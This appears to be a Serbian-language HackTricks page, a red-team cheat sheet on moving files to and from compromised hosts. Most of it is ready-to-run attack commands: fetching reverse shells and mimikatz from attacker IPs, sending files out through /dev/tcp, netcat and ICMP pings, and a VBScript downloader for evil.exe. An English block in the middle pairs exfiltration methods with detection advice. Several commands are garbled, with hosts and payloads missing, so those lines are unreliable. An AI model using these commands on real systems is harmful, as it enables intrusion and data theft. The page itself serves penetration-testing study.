# Izfiltracija
Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! Drugi načini podrške HackTricks-u: * Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJATELJSTVO**](https://github.com/sponsors/carlospolop)! * Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) * Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) * **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** * **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
**Try Hard Security Group**
{% embed url="https://discord.gg/tryhardsecurity" %} *** ## Često belistovane domene za izfiltriranje informacija Proverite [https://lots-project.com/](https://lots-project.com/) da biste pronašli često belistovane domene koje mogu biti zloupotrebljene ## Kopiranje\&lepljenje Base64 **Linux** ```bash base64 -w0 #Encode file base64 -d file #Decode file ``` **Windows** ``` certutil -encode payload.dll payload.b64 certutil -decode payload.b64 payload.dll ``` ## HTTP **Linux** ```bash wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py wget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py fetch 10.10.14.14:8000/shell.py #FreeBSD ``` **Windows** ```bash certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 bitsadmin /transfer transfName /priority high http://example.com/examplefile.pdf C:\downloads\examplefile.pdf #PS (New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe") Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe" wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe" Import-Module BitsTransfer Start-BitsTransfer -Source $url -Destination $output #OR Start-BitsTransfer -Source $url -Destination $output -Asynchronous ``` ### Postavljanje fajlova * [**SimpleHttpServerWithFileUploads**](https://gist.github.com/UniIsland/3346170) * [**SimpleHttpServer printing GET and POSTs (also headers)**](https://gist.github.com/carlospolop/209ad4ed0e06dd3ad099e2fd0ed73149) * Python modul [uploadserver](https://pypi.org/project/uploadserver/): ```bash # Listen to files python3 -m pip install --user uploadserver python3 -m uploadserver # With basic auth: # python3 -m uploadserver --basic-auth hello:world # Send a file curl -X POST http://HOST/upload -H -F 'files=@file.txt' # With basic auth: # curl -X POST http://HOST/upload -H -F 'files=@file.txt' -u hello:world ``` ### **HTTPS Server** ### **HTTPS Server** ```python # from https://gist.github.com/dergachev/7028596 # taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/ # generate server.xml with the following command: # openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes # run as follows: # python simple-https-server.py # then in your browser, visit: # https://localhost:443 ### PYTHON 2 import BaseHTTPServer, SimpleHTTPServer import ssl httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 443), SimpleHTTPServer.SimpleHTTPRequestHandler) httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True) httpd.serve_forever() ### ### PYTHON3 from http.server import HTTPServer, BaseHTTPRequestHandler import ssl httpd = HTTPServer(('0.0.0.0', 443), BaseHTTPRequestHandler) httpd.socket = ssl.wrap_socket(httpd.socket, certfile="./server.pem", server_side=True) httpd.serve_forever() ### ### USING FLASK from flask import Flask, redirect, request from urllib.parse import quote app = Flask(__name__) @app.route('/') def root(): print(request.get_json()) return "OK" if __name__ == "__main__": app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443) ### ``` ## FTP ### FTP server (python) ```bash pip3 install pyftpdlib python3 -m pyftpdlib -p 21 ``` ### FTP server (NodeJS) ### FTP server (NodeJS) ``` sudo npm install -g ftp-srv --save ftp-srv ftp://0.0.0.0:9876 --root /tmp ``` ### FTP server (pure-ftp) ```bash apt-get update && apt-get install pure-ftp ``` ```bash #Run the following script to configure the FTP server #!/bin/bash groupadd ftpgroup useradd -g ftpgroup -d /dev/null -s /etc ftpuser pure-pwd useradd fusr -u ftpuser -d /ftphome pure-pw mkdb cd /etc/pure-ftpd/auth/ ln -s ../conf/PureDB 60pdb mkdir -p /ftphome chown -R ftpuser:ftpgroup /ftphome/ /etc/init.d/pure-ftpd restart ``` ### **Windows** klijent ```bash #Work well with python. With pure-ftp use fusr:ftp echo open 10.11.0.41 21 > ftp.txt echo USER anonymous >> ftp.txt echo anonymous >> ftp.txt echo bin >> ftp.txt echo GET mimikatz.exe >> ftp.txt echo bye >> ftp.txt ftp -n -v -s:ftp.txt ``` ## SMB Kali kao server ```bash kali_op1> impacket-smbserver -smb2support kali `pwd` # Share current directory kali_op2> smbserver.py -smb2support name /path/folder # Share a folder #For new Win10 versions impacket-smbserver -smb2support -user test -password test test `pwd` ``` Ili kreirajte smb deljenje **koristeći sambu**: ```bash apt-get install samba mkdir /tmp/smb chmod 777 /tmp/smb #Add to the end of /etc/samba/smb.conf this: [public] comment = Samba on Ubuntu path = /tmp/smb read only = no browsable = yes guest ok = Yes #Start samba service smbd restart ``` Windows --- ### Exfiltration #### Exfiltration Over Alternative Protocol 1. **Description** Data exfiltration can be achieved using various protocols other than HTTP/HTTPS, such as DNS, ICMP, or SMTP. These protocols are often allowed to traverse network boundaries and can be used to bypass egress filtering. 2. **Detection** - Monitor network traffic for unusual DNS requests, especially those containing encoded data. - Look for abnormal ICMP traffic patterns that may indicate data exfiltration. - Analyze SMTP traffic for unexpected attachments or unusual sending patterns. 3. **Prevention** - Implement egress filtering rules that restrict the use of alternative protocols. - Use deep packet inspection to detect and block exfiltration attempts over alternative protocols. - Encrypt sensitive data before transmission to make exfiltration more difficult. 4. **Tools** - **[Iodine](https://github.com/yarrick/iodine):** Tunnel IPv4 data through a DNS server. - **[ChopChop](https://github.com/MITRECND/chopchop):** Craft and send arbitrary IP packets. - **[SMTP-Tester](https://github.com/le4f/smtp-tester):** Test SMTP server for open relays. #### Exfiltration Over Unencrypted/Unauthenticated Protocols 1. **Description** Exfiltrating data over unencrypted or unauthenticated protocols, such as FTP or Telnet, can expose sensitive information to interception by network eavesdroppers. 2. **Detection** - Monitor network traffic for clear-text passwords or sensitive data being transmitted over unencrypted protocols. - Look for unauthorized FTP or Telnet connections originating from internal hosts. 3. **Prevention** - Encrypt data before transmission using secure protocols like SFTP or SSH. - Disable or restrict the use of unencrypted/ unauthenticated protocols within the network. - Implement strong authentication mechanisms to prevent unauthorized access to sensitive services. 4. **Tools** - **[Wireshark](https://www.wireshark.org/):** Analyze network traffic to identify clear-text data transmissions. - **[Nmap](https://nmap.org/):** Scan for open FTP or Telnet ports on network devices. - **[FileZilla](https://filezilla-project.org/):** Securely transfer files using SFTP/FTP over SSH. #### Exfiltration Over DNS 1. **Description** DNS exfiltration involves encoding sensitive data within DNS queries or responses to bypass network security controls and exfiltrate data. 2. **Detection** - Monitor DNS traffic for unusually large queries or responses that may contain exfiltrated data. - Look for patterns in DNS requests that deviate from normal domain resolution behavior. - Analyze DNS query timings and volume for signs of data exfiltration. 3. **Prevention** - Implement DNS sinkholing to redirect suspicious DNS traffic to controlled servers. - Use DNS firewall rules to block unauthorized DNS queries containing suspicious data. - Encrypt DNS traffic using DNS over HTTPS (DoH) or DNS over TLS (DoT) to prevent eavesdropping. 4. **Tools** - **[Dnscat2](https://github.com/iagox86/dnscat2):** Multi-platform tool for tunneling data through DNS servers. - **[Dns2tcp](https://github.com/bortzmeyer/dns2tcp):** Tunnel TCP over DNS. - **[dnsteal](https://github.com/m57/dnsteal):** Extract data from DNS traffic. --- ```bash CMD-Wind> \\10.10.14.14\path\to\exe CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentials WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.14.9\kali" WindPS-2> cd new_disk: ``` ## SCP Napadač mora imati pokrenut SSHd. ```bash scp @:/ ``` ## SSHFS Ako žrtva ima SSH, napadač može montirati direktorijum sa žrtve na napadača. ```bash sudo apt-get install sshfs sudo mkdir /mnt/sshfs sudo sshfs -o allow_other,default_permissions @:/ /mnt/sshfs/ ``` ## NC Netcat (NC) je moćan alat za mrežno preusmeravanje podataka. Može se koristiti za prenos podataka između sistema putem TCP ili UDP veza. NC može biti korišćen za slanje fajlova, snimanje portova i mnoge druge mrežne operacije. ```bash nc -lvnp 4444 > new_file nc -vn 4444 < exfil_file ``` ## /dev/tcp ### Preuzimanje fajla sa žrtve ```bash nc -lvnp 80 > file #Inside attacker cat /path/file > /dev/tcp/10.10.10.10/80 #Inside victim ``` ### Postavljanje fajla žrtvi ```bash nc -w5 -lvnp 80 < file_to_send.txt # Inside attacker # Inside victim exec 6< /dev/tcp/10.10.10.10/4444 cat <&6 > file.txt ``` Zahvaljujući **@BinaryShadow\_** ## **ICMP** ```bash # To exfiltrate the content of a file via pings you can do: xxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line ; done #This will 4bytes per ping packet (you could probably increase this until 16) ``` ```python from scapy.all import * #This is ippsec receiver created in the HTB machine Mischief def process_packet(pkt): if pkt.haslayer(ICMP): if pkt[ICMP].type == 0: data = pkt[ICMP].load[-4:] #Read the 4bytes interesting print(f"{data.decode('utf-8')}", flush=True, end="") sniff(iface="tun0", prn=process_packet) ``` ## **SMTP** Ako možete poslati podatke na SMTP server, možete kreirati SMTP da primite podatke pomoću python-a: ```bash sudo python -m smtpd -n -c DebuggingServer :25 ``` ## TFTP Podrazumevano u XP i 2003 (u drugima mora biti eksplicitno dodato tokom instalacije) Na Kali, **pokreni TFTP server**: ```bash #I didn't get this options working and I prefer the python option mkdir /tftp atftpd --daemon --port 69 /tftp cp /path/tp/nc.exe /tftp ``` **TFTP server u Pythonu:** ```bash pip install ptftpd ptftpd -p 69 tap0 . # ptftp -p ``` Na **žrtvu**, povežite se sa Kali serverom: ```bash tftp -i get nc.exe ``` ## PHP Preuzmite fajl pomoću PHP jednolinijske komande: ```bash echo "" > down2.php ``` ## VBScript ```bash Attacker> python -m SimpleHTTPServer 80 ``` **Žrtva** ```bash echo strUrl = WScript.Arguments.Item(0) > wget.vbs echo StrFile = WScript.Arguments.Item(1) >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs echo Err.Clear >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs echo If http Is Nothing Then Set http =CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs echo http.Open "GET", strURL, False >> wget.vbs echo http.Send >> wget.vbs echo varByteArray = http.ResponseBody >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs echo strData = "" >> wget.vbs echo strBuffer = "" >> wget.vbs echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs echo Next >> wget.vbs echo ts.Close >> wget.vbs ``` ```bash cscript wget.vbs http://10.11.0.5/evil.exe evil.exe ``` ## Debug.exe Program `debug.exe` ne samo što omogućava inspekciju binarnih fajlova već takođe ima **mogućnost da ih rekonstruiše iz heksadecimalnog koda**. To znači da, pružajući heksadecimalni kod binarnog fajla, `debug.exe` može generisati binarni fajl. Međutim, važno je napomenuti da debug.exe ima **ograničenje u sastavljanju fajlova do 64 kb veličine**. ```bash # Reduce the size upx -9 nc.exe wine exe2bat.exe nc.exe nc.txt ``` ## DNS * [https://github.com/62726164/dns-exfil](https://github.com/62726164/dns-exfil) **Try Hard Security Group**
{% embed url="https://discord.gg/tryhardsecurity" %}
Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! Drugi načini podrške HackTricks-u: * Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** Proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)! * Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) * Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) * **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** * **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.